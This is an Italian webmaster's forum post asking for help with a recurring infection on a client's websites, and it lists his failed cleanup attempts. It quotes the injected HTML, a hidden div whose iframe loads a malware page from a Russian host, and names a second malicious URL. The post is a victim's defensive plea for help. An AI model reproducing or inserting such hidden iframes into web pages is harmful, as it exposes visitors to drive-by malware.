Salve a tutti..
Da qualche mese ormai combatto con un problema che ho in alcuni siti di un mio cliente ma senza riuscire a venirne a capo e la cosa è inutile dire che sta iniziando a seccarmi e non poco...

IL PROBLEMA
Da qualche tempo se entro nei siti appare una richiesta di installazione di un componente aggiuntivo:



Anche se l'installazione del componente aggiuntivo non viene accettata, l'antivirus si mette a cantare e iniziano ad aprirsi finestre, cambia lo sfondo del desktop con una immagine con scritto VIRUS ALERT, e il pc si riavvia incessantemente.... Questo problema appare in maniera alternata tra i vari siti, a volte carica in un sito a volte in un altro! Cmq guardo l'html della index dal sito in questione tramite il browser di IE e vedo:

<body bgcolor="#000000" background="eleganti0060.jpg" text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"><<div style="display:none">zziznrdodxjqmkoteruubwwggbtnz te<iframe width=872 height=315 src="http://onetherlife. ru:8080/index.php" ></iframe></div>

Aprendo la pagina interessata con il programma di grafica con il quale ho realizzato i siti (Dreamweaver MX) non esiste nulla di simile.. Non vi è traccia di quell'Iframe!
Rifaccio allora l'upload della pagina (pulita) e vado subito a vedere l'html tramite browser e il pezzo di codice in effetti non c'è più e la richiesta di installazione del componente aggiuntivo non compare.. ma se aggiorno la index e ricontrollo l'html sempre tramite browser, la stringa malevola di codice html infetto riappare e la richiesta di componente aggiuntivo idem... l'antivirus ricomincia a suonare ed ecco che tutto riparte, finestre riavvii ecc..
ESALTANTE VERO??



I MIEI TENTATIVI

1)L'assistenza del mio hosting (Natan) ha controllato a fondo i server e dice di non aver trovato nessun virus.. mi ha comunicato che con firebug hanno visto che viene caricata da qualche parte una pagina http://death testing. com:8080/index.php come appunto ho indicato nel codice soprascritto.

2) Ho letto da qualche parte che questi (giochetti) sono soliti farli i JavaScript contenuti nelle pagine, allora ho tolto il contatore di visite "PhpStats" il bottone "aggiungi a preferiti" e lo script "Aggiungi www.sito .com come pagina iniziale" ma la modifica non ha dato esiti positivi.. il virus parte ancora..

3) ho provato a riscrivere tutte le index da capo (non con copia e incolla) e ho eliminato tutte le vecchie index. Ieri ci ho messo 14 ore a rifare tutto da capo.. poi attraverso ftp ho prima cancellato le vecchie index (probabilmente con codice html infetto) e poi ho riuploadato le nuove index ognuna per ciascun sito.. Risultato: il virus carica ancora indisturbato!

4)Ho provato ad eliminare tutta la lista dei link testuali che collegavano i siti tra di loro ma nulla problema ancora irrisolto!

5) Mi sono appoggiato al forum Zeus dell'olimpo informatico nella sezione virus, e un gentile utente esperto mi ha praticamente lustrato a nuovo il sistema operativo, lui pensava che questo problema sorgesse proprio da una infezione presente nel mio pc che poi tramettevo in rete, ma anche dopo la ripulita in grande stile con i vari Malwarebytes, Combofix, hijackthis e scansione di 3 ore e passa con Kaspersky online.... stamattina il problema si è ripresentato!

6) Mi sono appoggiato anche al forum di google per webmaster, ho visto 3d simili al mio qui come questo: http://www.google.com/support/forum/...e2d34c46&hl=it
ma vedo che nessuno sa che pesci prendere e nessuno sa da cosa dipende!!

7) Allora mi sono messo a ripulire tutte le root dei siti tramite ftp, togliendo ogni file inutile, tutti i file.js cartelle obsolete e alla fine restano solo le pagine html e le immagini.

Adesso mentre scrivo dopo il tentativo numero 7 il problema sembra essere risolto ma sembrava fosse risolto anche con tutti gli altri tentativi fatti in precedenza! Non voglio portarmi m...a da solo ma vorrei iniziare a capire da dove nasce questo problema!



La mia domanda è: come si fa per eliminare questo virus?
come è possibile che venga aggiunto l'Iframe a mia insaputa? Succede via web, ftp oppure tramite il mio pc? come si può fare per risolvere questo problema? E soprattutto tutelarsi per il futuro?

Scusate tutti per la dilungaggine ma ho voluto essere più chiaro possibile in modo da essere capito bene e per trovare una soluzione ad un problema che pare stia prendendo molto campo negli ultimi mesi del 2009!

Grazie a tutti coloro che vorranno provare ad aiutarmi!!
Fabrizio